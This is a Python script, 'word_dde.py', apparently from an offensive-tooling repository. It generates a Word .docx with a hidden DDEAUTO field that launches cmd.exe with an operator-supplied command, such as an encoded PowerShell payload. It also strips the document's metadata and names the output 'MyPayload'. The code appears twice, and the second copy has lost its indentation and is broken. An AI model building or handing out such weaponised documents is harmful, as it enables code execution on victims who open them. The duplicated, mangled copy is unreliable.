safebuffer/word_dde.py

## word_dde.py
# -*- coding: utf-8 -*-

import win32com.client
import os
import argparse

def closeallword():
    try:
        objWord = win32com.client.Dispatch("Word.Application")
        objWord.Application.Quit()
        del objWord
    except:
        pass

def main(args):
    command = args.command
    outpath = os.path.join(os.getcwd(), f"{args.filename}.docx")
    try:
        os.remove(outpath)
    except:
        pass
    closeallword()
    word = win32com.client.Dispatch("Word.Application")
    word.Visible = False
    document = word.Documents.Add()
    wdFormatDocument = 0
    document.SaveAs(outpath, FileFormat=12)
    print(f"[+] Created file {outpath}")
    document = None
    document = word.Documents.Open(outpath)
    ddeCmd = r'"\"c:\\Program Files\\Microsoft Office\\MSWORD\\..\\..\\..\\windows\\system32\\cmd.exe\" /c %s" "."' % command.rstrip()
    wdFieldDDEAuto=46
    document.Fields.Add(Range=word.Selection.Range,Type=wdFieldDDEAuto, Text=ddeCmd, PreserveFormatting=False)
    print(f"[+] Command {command} injected ")
    word.DisplayAlerts=False
    wdRDIAll=99
    document.RemoveDocumentInformation(wdRDIAll)
    document.Save()
    document.Close()
    word.Application.Quit()
    del word
    print(f"[+] Done")


if __name__ == "__main__":
    parser = argparse.ArgumentParser(add_help = True, description = "Generate DDE Word.docx")
    parser.add_argument("command", help="powershell.exe -EncodedCommand 'JABnAGwAb'")
    parser.add_argument("filename", help="MyPayload , file name without extension ")
    options = parser.parse_args()
    main(options)
	# -- coding: utf-8 --

	import win32com.client
	import os
	import argparse

	def closeallword():
	try:
	objWord = win32com.client.Dispatch("Word.Application")
	objWord.Application.Quit()
	del objWord
	except:
	pass

	def main(args):
	command = args.command
	outpath = os.path.join(os.getcwd(), f"{args.filename}.docx")
	try:
	os.remove(outpath)
	except:
	pass
	closeallword()
	word = win32com.client.Dispatch("Word.Application")
	word.Visible = False
	document = word.Documents.Add()
	wdFormatDocument = 0
	document.SaveAs(outpath, FileFormat=12)
	print(f"[+] Created file {outpath}")
	document = None
	document = word.Documents.Open(outpath)
	ddeCmd = r'"\"c:\\Program Files\\Microsoft Office\\MSWORD\\..\\..\\..\\windows\\system32\\cmd.exe\" /c %s" "."' % command.rstrip()
	wdFieldDDEAuto=46
	document.Fields.Add(Range=word.Selection.Range,Type=wdFieldDDEAuto, Text=ddeCmd, PreserveFormatting=False)
	print(f"[+] Command {command} injected ")
	word.DisplayAlerts=False
	wdRDIAll=99
	document.RemoveDocumentInformation(wdRDIAll)
	document.Save()
	document.Close()
	word.Application.Quit()
	del word
	print(f"[+] Done")


	if __name__ == "__main__":
	parser = argparse.ArgumentParser(add_help = True, description = "Generate DDE Word.docx")
	parser.add_argument("command", help="powershell.exe -EncodedCommand 'JABnAGwAb'")
	parser.add_argument("filename", help="MyPayload , file name without extension ")
	options = parser.parse_args()
	main(options)